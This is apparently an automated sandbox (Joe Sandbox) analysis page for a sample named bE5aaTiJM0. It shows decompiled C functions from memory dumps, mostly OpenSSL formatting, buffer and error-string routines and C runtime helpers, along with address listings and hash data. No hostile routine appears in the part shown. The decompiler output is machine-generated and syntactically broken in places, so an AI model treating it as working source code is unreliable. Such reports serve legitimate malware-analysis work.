                                                                                    												if( *_t233 == 0) {
                                                                                    													 *_t233 = 0x400;
                                                                                    												}
                                                                                    												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
                                                                                    												_t253 = _t253 + 0xc;
                                                                                    												_t206 =  *_t182;
                                                                                    												__eflags = _t206;
                                                                                    												if(_t206 != 0) {
                                                                                    													E0042D8D0(_t152, _v0, _t206);
                                                                                    													_t253 = _t253 + 0xc;
                                                                                    												}
                                                                                    												_v0 = 0;
                                                                                    											}
                                                                                    											__eflags =  *_t182 -  *_t233;
                                                                                    										} while ( *_t182 >=  *_t233);
                                                                                    										_t214 = _v16;
                                                                                    									}
                                                                                    								}
                                                                                    								_t203 =  *_t182;
                                                                                    								__eflags = _t203 -  *_t233;
                                                                                    								if(_t203 <  *_t233) {
                                                                                    									_t148 = _v0;
                                                                                    									__eflags = _t148;
                                                                                    									if(_t148 == 0) {
                                                                                    										 *((char*)(_t203 +  *_t221)) = 0x20;
                                                                                    									} else {
                                                                                    										 *((char*)(_t148 + _t203)) = 0x20;
                                                                                    									}
                                                                                    									 *_t182 =  *_t182 + 1;
                                                                                    									__eflags =  *_t182;
                                                                                    								}
                                                                                    								_t214 = _t214 + 1;
                                                                                    								_t205 = _a16 - 1;
                                                                                    								_v16 = _t214;
                                                                                    								_a16 = _t205;
                                                                                    								__eflags = _t205;
                                                                                    								if(_t205 > 0) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L71;
                                                                                    							}
                                                                                    						}
                                                                                    						L71:
                                                                                    						_t200 = _a8;
                                                                                    						_t143 =  *_t200;
                                                                                    						__eflags = _t143;
                                                                                    						if(_t143 != 0) {
                                                                                    							_a8 = _t200 - _t214;
                                                                                    							while(1) {
                                                                                    								__eflags = _t214 - _a20;
                                                                                    								if(_t214 >= _a20) {
                                                                                    									goto L75;
                                                                                    								}
                                                                                    								E00456F70(_t250, _t221, _t182, _t233, _t143);
                                                                                    								_t253 = _t253 + 0x14;
                                                                                    								_t214 = _v16 + 1;
                                                                                    								_v16 = _t214;
                                                                                    								_t143 =  *((intOrPtr*)(_a8 + _t214));
                                                                                    								__eflags = _t143;
                                                                                    								if(_t143 != 0) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L75;
                                                                                    							}
                                                                                    						}
                                                                                    						L75:
                                                                                    						__eflags = _a16;
                                                                                    						if(_a16 < 0) {
                                                                                    							while(1) {
                                                                                    								__eflags = _t214 - _a20;
                                                                                    								if(_t214 >= _a20) {
                                                                                    									goto L78;
                                                                                    								}
                                                                                    								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
                                                                                    								_t253 = _t253 + 0x14;
                                                                                    								_t214 = _v16 + 1;
                                                                                    								_t124 =  &_a16;
                                                                                    								 *_t124 = _a16 + 1;
                                                                                    								__eflags =  *_t124;
                                                                                    								_v16 = _t214;
                                                                                    								if( *_t124 < 0) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L78;
                                                                                    							}
                                                                                    						}
                                                                                    						L78:
                                                                                    						return _t143;
                                                                                    					} else {
                                                                                    						goto L18;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t220 = 0x19;
                                                                                    					_a16 = 0x19;
                                                                                    					L18:
                                                                                    					_t184 = _a100;
                                                                                    					_t217 = _t232;
                                                                                    					 *((char*)(_t253 + _t220 + 0x30)) = 0;
                                                                                    					_t208 = _t184 - _t220;
                                                                                    					_t235 = _t217 + 1;
                                                                                    					do {
                                                                                    						_t154 =  *_t217;
                                                                                    						_t217 = _t217 + 1;
                                                                                    					} while (_t154 != 0);
                                                                                    					_t218 = _t217 - _t235;
                                                                                    					_t156 =  >=  ? _t184 : _t220;
                                                                                    					_t237 = _a96 - ( >=  ? _t184 : _t220);
                                                                                    					_t268 = _a12;
                                                                                    					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
                                                                                    					_t209 =  <  ? 0 : _t208;
                                                                                    					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
                                                                                    					_a24 = _t209;
                                                                                    					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
                                                                                    					_t160 = _a104;
                                                                                    					_a96 = _t240;
                                                                                    					if((_t160 & 0x00000010) != 0) {
                                                                                    						_t246 =  >=  ? _t209 : _t240;
                                                                                    						_a24 =  >=  ? _t209 : _t240;
                                                                                    						_t240 = 0;
                                                                                    						_a96 = 0;
                                                                                    					}
                                                                                    					if((_t160 & 0x00000001) != 0) {
                                                                                    						_t240 =  ~_t240;
                                                                                    						_a96 = _t240;
                                                                                    					}
                                                                                    					_t64 =  &_a28; // 0x456c55
                                                                                    					_t185 =  *_t64;
                                                                                    					if(_t240 > 0) {
                                                                                    						_t226 = _a8;
                                                                                    						do {
                                                                                    							E00456F70(_t249, _t185, _t226, _v0, 0x20);
                                                                                    							_t240 = _t240 - 1;
                                                                                    							_t253 = _t253 + 0x14;
                                                                                    						} while (_t240 > 0);
                                                                                    						_t220 = _a16;
                                                                                    						_a96 = _t240;
                                                                                    					}
                                                                                    					_t161 = _a12;
                                                                                    					if(_a12 != 0) {
                                                                                    						E00456F70(_t249, _t185, _a8, _v0, _t161);
                                                                                    						_t253 = _t253 + 0x14;
                                                                                    					}
                                                                                    					_t163 =  *_a4;
                                                                                    					if( *_a4 != 0) {
                                                                                    						_t245 = _a8;
                                                                                    						_t225 = _v0;
                                                                                    						do {
                                                                                    							E00456F70(_t249, _t185, _t245, _t225, _t163);
                                                                                    							_t253 = _t253 + 0x14;
                                                                                    							_t174 = _a4 + 1;
                                                                                    							_a4 = _t174;
                                                                                    							_t163 =  *_t174;
                                                                                    						} while ( *_t174 != 0);
                                                                                    						_t240 = _a96;
                                                                                    						_t220 = _a16;
                                                                                    					}
                                                                                    					if(_a24 > 0) {
                                                                                    						_t244 = _a8;
                                                                                    						_t224 = _v0;
                                                                                    						do {
                                                                                    							E00456F70(_t249, _t185, _t244, _t224, 0x30);
                                                                                    							_t253 = _t253 + 0x14;
                                                                                    							_t170 = _a24 - 1;
                                                                                    							_a24 = _t170;
                                                                                    						} while (_t170 > 0);
                                                                                    						_t240 = _a96;
                                                                                    						_t220 = _a16;
                                                                                    					}
                                                                                    					if(_t220 > 0) {
                                                                                    						_t243 = _a8;
                                                                                    						do {
                                                                                    							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
                                                                                    							_t220 = _t220 - 1;
                                                                                    							E00456F70(_t249, _t185, _t243, _v0, _t166);
                                                                                    							_t253 = _t253 + 0x14;
                                                                                    						} while (_t220 > 0);
                                                                                    						_t240 = _a96;
                                                                                    					}
                                                                                    					if(_t240 < 0) {
                                                                                    						_t242 =  ~_t240;
                                                                                    						do {
                                                                                    							E00456F70(_t249, _t185, _a8, _v0, 0x20);
                                                                                    							_t253 = _t253 + 0x14;
                                                                                    							_t242 = _t242 - 1;
                                                                                    						} while (_t242 != 0);
                                                                                    					}
                                                                                    					_pop(_t223);
                                                                                    					_pop(_t241);
                                                                                    					_pop(_t186);
                                                                                    					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
                                                                                    				}
                                                                                    			}

                                                                                    0x004576b5
                                                                                    0x004576ba
                                                                                    0x004576be
                                                                                    0x004576c0
                                                                                    0x004576c2
                                                                                    0x004576ca
                                                                                    0x004576cd
                                                                                    0x004576cf
                                                                                    0x004576d3
                                                                                    0x004576d5
                                                                                    0x004576d7
                                                                                    0x004576d7
                                                                                    0x004576d8
                                                                                    0x004576d8
                                                                                    0x004576d7
                                                                                    0x004576e5
                                                                                    0x004576e8
                                                                                    0x004576ed
                                                                                    0x004576f1
                                                                                    0x004576f3
                                                                                    0x004576f5
                                                                                    0x004576f5
                                                                                    0x004576f9
                                                                                    0x004576fa
                                                                                    0x004576fe
                                                                                    0x004576ff
                                                                                    0x00457703
                                                                                    0x00457704
                                                                                    0x00457708
                                                                                    0x00457709
                                                                                    0x0045770d
                                                                                    0x0045770f
                                                                                    0x00457715
                                                                                    0x00457715
                                                                                    0x00457719
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0045771f
                                                                                    0x00457721
                                                                                    0x00457725
                                                                                    0x00457727
                                                                                    0x00457730
                                                                                    0x00457730
                                                                                    0x00457733
                                                                                    0x00457772
                                                                                    0x00457772
                                                                                    0x00457786
                                                                                    0x0045778b
                                                                                    0x0045778e
                                                                                    0x00457735
                                                                                    0x00457735
                                                                                    0x00457738
                                                                                    0x0045773a
                                                                                    0x0045773a
                                                                                    0x00457751
                                                                                    0x00457753
                                                                                    0x00457756
                                                                                    0x00457758
                                                                                    0x0045775a
                                                                                    0x00457761
                                                                                    0x00457766
                                                                                    0x00457766
                                                                                    0x00457769
                                                                                    0x00457769
                                                                                    0x00457792
                                                                                    0x00457792
                                                                                    0x00457796
                                                                                    0x00457796
                                                                                    0x00457727
                                                                                    0x0045779a
                                                                                    0x0045779c
                                                                                    0x0045779e
                                                                                    0x004577a0
                                                                                    0x004577a3
                                                                                    0x004577a5
                                                                                    0x004577af
                                                                                    0x004577a7
                                                                                    0x004577a7
                                                                                    0x004577a7
                                                                                    0x004577b3
                                                                                    0x004577b3
                                                                                    0x004577b3
                                                                                    0x004577b9
                                                                                    0x004577ba
                                                                                    0x004577bb
                                                                                    0x004577bf
                                                                                    0x004577c3
                                                                                    0x004577c5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004577c5
                                                                                    0x00457715
                                                                                    0x004577cb
                                                                                    0x004577cb
                                                                                    0x004577cf
                                                                                    0x004577d1
                                                                                    0x004577d3
                                                                                    0x004577d7
                                                                                    0x004577e0
                                                                                    0x004577e0
                                                                                    0x004577e4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004577ee
                                                                                    0x004577f7
                                                                                    0x004577fe
                                                                                    0x004577ff
                                                                                    0x00457803
                                                                                    0x00457806
                                                                                    0x00457808
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00457808
                                                                                    0x004577e0
                                                                                    0x0045780a
                                                                                    0x0045780a
                                                                                    0x0045780f
                                                                                    0x00457811
                                                                                    0x00457811
                                                                                    0x00457815
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0045781d
                                                                                    0x00457826
                                                                                    0x00457829
                                                                                    0x0045782a
                                                                                    0x0045782a
                                                                                    0x0045782a
                                                                                    0x0045782e
                                                                                    0x00457832
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00457832
                                                                                    0x00457811
                                                                                    0x00457834
                                                                                    0x00457839
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00457518
                                                                                    0x00457518
                                                                                    0x0045751d
                                                                                    0x00457529
                                                                                    0x00457529
                                                                                    0x0045752d
                                                                                    0x00457531
                                                                                    0x00457536
                                                                                    0x00457538
                                                                                    0x00457540
                                                                                    0x00457540
                                                                                    0x00457542
                                                                                    0x00457543
                                                                                    0x00457547
                                                                                    0x00457551
                                                                                    0x00457554
                                                                                    0x00457558
                                                                                    0x0045755f
                                                                                    0x00457565
                                                                                    0x00457568
                                                                                    0x0045756a
                                                                                    0x0045756e
                                                                                    0x00457571
                                                                                    0x00457575
                                                                                    0x0045757b
                                                                                    0x0045757f
                                                                                    0x00457582
                                                                                    0x00457586
                                                                                    0x00457588
                                                                                    0x00457588
                                                                                    0x0045758e
                                                                                    0x00457590
                                                                                    0x00457592
                                                                                    0x00457592
                                                                                    0x00457596
                                                                                    0x00457596
                                                                                    0x0045759c
                                                                                    0x0045759e
                                                                                    0x004575a2
                                                                                    0x004575ab
                                                                                    0x004575b0
                                                                                    0x004575b1
                                                                                    0x004575b4
                                                                                    0x004575b8
                                                                                    0x004575bc
                                                                                    0x004575bc
                                                                                    0x004575c0
                                                                                    0x004575c6
                                                                                    0x004575d3
                                                                                    0x004575d8
                                                                                    0x004575d8
                                                                                    0x004575df
                                                                                    0x004575e3
                                                                                    0x004575e5
                                                                                    0x004575e9
                                                                                    0x004575f0
                                                                                    0x004575f8
                                                                                    0x00457601
                                                                                    0x00457604
                                                                                    0x00457605
                                                                                    0x00457609
                                                                                    0x0045760b
                                                                                    0x0045760f
                                                                                    0x00457613
                                                                                    0x00457613
                                                                                    0x0045761c
                                                                                    0x0045761e
                                                                                    0x00457622
                                                                                    0x00457626
                                                                                    0x0045762c
                                                                                    0x00457635
                                                                                    0x00457638
                                                                                    0x00457639
                                                                                    0x0045763d
                                                                                    0x00457641
                                                                                    0x00457645
                                                                                    0x00457645
                                                                                    0x0045764b
                                                                                    0x0045764d
                                                                                    0x00457651
                                                                                    0x00457651
                                                                                    0x00457656
                                                                                    0x0045765f
                                                                                    0x00457664
                                                                                    0x00457667
                                                                                    0x0045766b
                                                                                    0x0045766b
                                                                                    0x00457671
                                                                                    0x00457673
                                                                                    0x00457675
                                                                                    0x00457681
                                                                                    0x00457686
                                                                                    0x00457689
                                                                                    0x00457689
                                                                                    0x00457675
                                                                                    0x00457690
                                                                                    0x00457691
                                                                                    0x00457693
                                                                                    0x0045769e
                                                                                    0x0045769e

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                    • API String ID: 1302938615-3129329331
                                                                                    • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                    • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                    • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                    • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00411B10() {
                                                                                    				intOrPtr _v8;
                                                                                    				struct tagMSG _v36;
                                                                                    				long _t9;
                                                                                    				long _t11;
                                                                                    				intOrPtr _t19;
                                                                                    
                                                                                    				_t1 = timeGetTime() + 0x1388; // 0x1388
                                                                                    				_t19 = _t1;
                                                                                    				_v8 = _t19;
                                                                                    				_t9 = timeGetTime();
                                                                                    				if(_t19 > _t9) {
                                                                                    					do {
                                                                                    						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
                                                                                    						if(_t11 == 0) {
                                                                                    							goto L5;
                                                                                    						}
                                                                                    						while(_v36.message != 0x12) {
                                                                                    							DispatchMessageW( &_v36);
                                                                                    							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
                                                                                    							if(_t11 != 0) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							goto L5;
                                                                                    						}
                                                                                    						break;
                                                                                    						L5:
                                                                                    						Sleep(0x64);
                                                                                    						_t11 = timeGetTime();
                                                                                    					} while (_v8 > _t11);
                                                                                    					return _t11;
                                                                                    				}
                                                                                    				return _t9;
                                                                                    			}









                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                    • String ID:
                                                                                    • API String ID: 3697694649-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 87%
                                                                                    			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v32;
                                                                                    				signed int _t16;
                                                                                    				intOrPtr _t17;
                                                                                    				signed int _t19;
                                                                                    				signed int _t20;
                                                                                    				signed int _t30;
                                                                                    				intOrPtr* _t35;
                                                                                    				intOrPtr* _t37;
                                                                                    				signed int* _t40;
                                                                                    				void* _t48;
                                                                                    				signed int _t50;
                                                                                    				signed int _t54;
                                                                                    				signed int _t57;
                                                                                    				intOrPtr _t58;
                                                                                    				intOrPtr _t59;
                                                                                    
                                                                                    				_t48 = __edx;
                                                                                    				_t40 = _a4;
                                                                                    				_t65 = _t40;
                                                                                    				if(_t40 != 0) {
                                                                                    					 *_t40 =  *_t40 & 0x00000000;
                                                                                    					_t54 = _a12;
                                                                                    					_t50 = _a8;
                                                                                    					__eflags = _t50;
                                                                                    					if(_t50 == 0) {
                                                                                    						__eflags = _t54;
                                                                                    						if(__eflags == 0) {
                                                                                    							goto L4;
                                                                                    						} else {
                                                                                    							goto L13;
                                                                                    						}
                                                                                    					} else {
                                                                                    						__eflags = _t54;
                                                                                    						if(__eflags == 0) {
                                                                                    							L13:
                                                                                    							_t35 = E00425208(__eflags);
                                                                                    							_t58 = 0x16;
                                                                                    							 *_t35 = _t58;
                                                                                    							E004242D2();
                                                                                    							_t17 = _t58;
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							L4:
                                                                                    							__eflags = _t50;
                                                                                    							if(_t50 != 0) {
                                                                                    								 *_t50 = 0;
                                                                                    							}
                                                                                    							_t16 = E00441667(_a16);
                                                                                    							_a4 = _t16;
                                                                                    							__eflags = _t16;
                                                                                    							if(_t16 == 0) {
                                                                                    								L15:
                                                                                    								_t17 = 0;
                                                                                    								goto L10;
                                                                                    							} else {
                                                                                    								_t19 = E0042C160(_t16) + 1;
                                                                                    								 *_t40 = _t19;
                                                                                    								__eflags = _t54;
                                                                                    								if(_t54 == 0) {
                                                                                    									goto L15;
                                                                                    								} else {
                                                                                    									__eflags = _t19 - _t54;
                                                                                    									if(_t19 <= _t54) {
                                                                                    										_t20 = E0042C0FD(_t50, _t54, _a4);
                                                                                    										__eflags = _t20;
                                                                                    										if(_t20 != 0) {
                                                                                    											_push(0);
                                                                                    											_push(0);
                                                                                    											_push(0);
                                                                                    											_push(0);
                                                                                    											_push(0);
                                                                                    											E004242FD(_t40, _t48);
                                                                                    											asm("int3");
                                                                                    											_push(0xc);
                                                                                    											_push(0x508078);
                                                                                    											E00428520(_t40, _t50, _t54);
                                                                                    											_v32 = _v32 & 0x00000000;
                                                                                    											_t56 = _a4;
                                                                                    											__eflags = _a4;
                                                                                    											__eflags = 0 | _a4 != 0x00000000;
                                                                                    											if(__eflags != 0) {
                                                                                    												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
                                                                                    												asm("sbb eax, eax");
                                                                                    												if(__eflags == 0) {
                                                                                    													goto L17;
                                                                                    												} else {
                                                                                    													E00428AF7(7);
                                                                                    													_t12 =  &_v8;
                                                                                    													 *_t12 = _v8 & 0x00000000;
                                                                                    													__eflags =  *_t12;
                                                                                    													_t57 = E00441667(_t56);
                                                                                    													_v32 = _t57;
                                                                                    													_v8 = 0xfffffffe;
                                                                                    													E004417FD();
                                                                                    													_t30 = _t57;
                                                                                    												}
                                                                                    											} else {
                                                                                    												L17:
                                                                                    												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
                                                                                    												E004242D2();
                                                                                    												_t30 = 0;
                                                                                    											}
                                                                                    											return E00428565(_t30);
                                                                                    										} else {
                                                                                    											goto L15;
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t17 = 0x22;
                                                                                    										L10:
                                                                                    										goto L11;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t37 = E00425208(_t65);
                                                                                    					_t59 = 0x16;
                                                                                    					 *_t37 = _t59;
                                                                                    					E004242D2();
                                                                                    					_t17 = _t59;
                                                                                    					L11:
                                                                                    					return _t17;
                                                                                    				}
                                                                                    			}



















                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                    • String ID:
                                                                                    • API String ID: 3534693527-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 29%
                                                                                    			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
                                                                                    				intOrPtr _v0;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t29;
                                                                                    				intOrPtr _t35;
                                                                                    				intOrPtr _t43;
                                                                                    				char* _t46;
                                                                                    				intOrPtr _t54;
                                                                                    				intOrPtr _t55;
                                                                                    				intOrPtr* _t57;
                                                                                    				void* _t65;
                                                                                    				void* _t66;
                                                                                    				intOrPtr* _t67;
                                                                                    				unsigned int _t68;
                                                                                    				void* _t69;
                                                                                    				signed int _t73;
                                                                                    				intOrPtr _t74;
                                                                                    				signed int _t75;
                                                                                    				void* _t76;
                                                                                    				signed int _t77;
                                                                                    
                                                                                    				E0042F7C0(0xd4);
                                                                                    				_t29 =  *0x50ad20; // 0x84f4da2
                                                                                    				_a208 = _t29 ^ _t75;
                                                                                    				_t54 = _a224;
                                                                                    				_t68 = _a216;
                                                                                    				_t67 = _a220;
                                                                                    				_t73 = _t68 >> 0x0000000c & 0x00000fff;
                                                                                    				_a8 = _t68 & 0x00000fff;
                                                                                    				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
                                                                                    				_v0 = E00450870(_t54, _t67, _t73, _t68);
                                                                                    				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
                                                                                    				_t76 = _t75 + 0xc;
                                                                                    				_a12 = _t35;
                                                                                    				if(_a4 == 0) {
                                                                                    					_push(_t68 >> 0x18);
                                                                                    					_push("lib(%lu)");
                                                                                    					_push(0x40);
                                                                                    					_push( &_a144);
                                                                                    					E004567A0(_t68 >> 0x18);
                                                                                    					_t76 = _t76 + 0x10;
                                                                                    				}
                                                                                    				_t81 = _v0;
                                                                                    				if(_v0 == 0) {
                                                                                    					_push(_t73);
                                                                                    					_push("func(%lu)");
                                                                                    					_push(0x40);
                                                                                    					_push( &_a80);
                                                                                    					E004567A0(_t81);
                                                                                    					_t76 = _t76 + 0x10;
                                                                                    				}
                                                                                    				_t74 = _a12;
                                                                                    				_t82 = _t74;
                                                                                    				if(_t74 == 0) {
                                                                                    					_push(_a8);
                                                                                    					_push("reason(%lu)");
                                                                                    					_push(0x40);
                                                                                    					_push( &_a16);
                                                                                    					E004567A0(_t82);
                                                                                    					_t76 = _t76 + 0x10;
                                                                                    				}
                                                                                    				_t55 = _v0;
                                                                                    				_t37 =  !=  ? _t74 :  &_a16;
                                                                                    				_push( !=  ? _t74 :  &_a16);
                                                                                    				_t39 =  !=  ? _t55 :  &_a80;
                                                                                    				_push( !=  ? _t55 :  &_a80);
                                                                                    				_t41 =  !=  ? _a4 :  &_a144;
                                                                                    				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
                                                                                    				_t57 = _t67;
                                                                                    				_t77 = _t76 + 0x1c;
                                                                                    				_t66 = _t57 + 1;
                                                                                    				do {
                                                                                    					_t43 =  *_t57;
                                                                                    					_t57 = _t57 + 1;
                                                                                    				} while (_t43 != 0);
                                                                                    				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
                                                                                    					_t69 = 0;
                                                                                    					_t54 = _t54 + _t67;
                                                                                    					do {
                                                                                    						_t46 = E00431C30(_t67, 0x3a);
                                                                                    						_t77 = _t77 + 8;
                                                                                    						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
                                                                                    							_t46 = _t54 - 5 + _t69;
                                                                                    							 *_t46 = 0x3a;
                                                                                    						}
                                                                                    						_t69 = _t69 + 1;
                                                                                    						_t67 = _t46 + 1;
                                                                                    					} while (_t69 < 4);
                                                                                    				}
                                                                                    				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
                                                                                    			}

























                                                                                    APIs
                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ___from_strstr_to_strchr
                                                                                    • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                    • API String ID: 601868998-2416195885
                                                                                    • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                    • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                    • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                    • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 97%
                                                                                    			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
                                                                                    				void* __edi;
                                                                                    				intOrPtr _t18;
                                                                                    				intOrPtr _t19;
                                                                                    				signed int _t40;
                                                                                    				intOrPtr _t43;
                                                                                    				signed int _t44;
                                                                                    				intOrPtr _t51;
                                                                                    				intOrPtr* _t52;
                                                                                    				intOrPtr _t53;
                                                                                    
                                                                                    				_t55 = __ebp;
                                                                                    				_t1 =  &_a8; // 0x463967
                                                                                    				_t53 =  *_t1;
                                                                                    				_t2 =  &_a4; // 0x463967
                                                                                    				_t52 =  *_t2;
                                                                                    				_t43 =  *_t52;
                                                                                    				if(_t43 < _t53) {
                                                                                    					__eflags =  *(_t52 + 8) - _t53;
                                                                                    					if( *(_t52 + 8) < _t53) {
                                                                                    						__eflags = _t53 - 0x5ffffffc;
                                                                                    						if(__eflags <= 0) {
                                                                                    							_t44 = _t53 + 3;
                                                                                    							_t50 = 0xaaaaaaab * _t44 >> 0x20;
                                                                                    							_t18 =  *((intOrPtr*)(_t52 + 4));
                                                                                    							_push(__ebx);
                                                                                    							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
                                                                                    							__eflags = _t18;
                                                                                    							if(_t18 != 0) {
                                                                                    								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
                                                                                    							} else {
                                                                                    								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
                                                                                    							}
                                                                                    							_t51 = _t19;
                                                                                    							__eflags = _t51;
                                                                                    							if(__eflags != 0) {
                                                                                    								__eflags = _t53 -  *_t52;
                                                                                    								 *((intOrPtr*)(_t52 + 4)) = _t51;
                                                                                    								 *(_t52 + 8) = _t40;
                                                                                    								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
                                                                                    								 *_t52 = _t53;
                                                                                    								return _t53;
                                                                                    							} else {
                                                                                    								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
                                                                                    								__eflags = 0;
                                                                                    								return 0;
                                                                                    							}
                                                                                    						} else {
                                                                                    							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    					} else {
                                                                                    						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
                                                                                    						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
                                                                                    						 *_t52 = _t53;
                                                                                    						return _t53;
                                                                                    					}
                                                                                    				} else {
                                                                                    					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
                                                                                    					 *_t52 = _t53;
